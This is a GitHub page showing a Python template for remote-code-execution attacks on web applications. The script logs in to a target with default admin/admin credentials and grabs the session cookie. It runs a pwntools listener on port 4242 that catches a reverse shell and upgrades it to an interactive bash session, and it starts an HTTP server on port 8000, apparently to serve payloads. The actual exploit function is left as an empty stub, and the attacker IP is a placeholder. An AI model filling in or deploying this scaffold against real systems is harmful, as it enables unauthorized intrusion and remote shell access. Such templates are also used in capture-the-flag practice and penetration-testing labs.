Web-RCE-Template/exploit.py at master · ariakis/Web-RCE-Template · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
import requests
from time import sleep
import threading # for http server
from pwn import listen

waitTime = 2

url = "http://localhost/"
myIP = "xxx"

invalidLoginResponse = "Invalid Username/Password"

def login(session):
    path="login.php"
    data = {
        "username":"admin",
        "password":"admin"
    }

    response = session.post(url+path, data=data)

    if invalidLoginResponse in response.text:
        print(response.text)
        return False
    else:
        return True

def exploit(session,ticketName):
    pass

def handler():
    l = listen(4242)

    l.sendline(""" python -c 'import pty; pty.spawn("/bin/bash")' """)
    l.sendline(""" export TERM=xterm256-color """)
    l.sendline(""" alias ls='ls -la --color=auto' """)
    l.sendline(""" alias l='ls' """)

    print("Starting interactive shell:")

    l.interactive()


def startHTTPServer():
    from http.server import HTTPServer, SimpleHTTPRequestHandler

    port = 8000

    httpd = HTTPServer(("0.0.0.0", port), SimpleHTTPRequestHandler)
    print("serving http at port:" + str(port))

    httpd.serve_forever()

def backgroundHTTPServer():
    threading.Thread(target=startHTTPServer).start() # start http server in background


def startHax():

    success = False

    while success == False:
        try:
            with requests.Session() as session:

                print("Logging in... ", end='')

                try:
                    if login(session):
                        cookie = {'PHPSESSID': requests.utils.dict_from_cookiejar(session.cookies)['PHPSESSID']}
                        print("Success! (cookie: "+str(cookie)+")")


                        # do stuff here


                    else:
                        print("Error logging in :(")

                except KeyError:
                    print("Error signing in - didn't get a cookie :/")


            success = True
        except requests.exceptions.ConnectionError:
            success = False
            print("No route to host :((")
            sleep(waitTime)


startHax()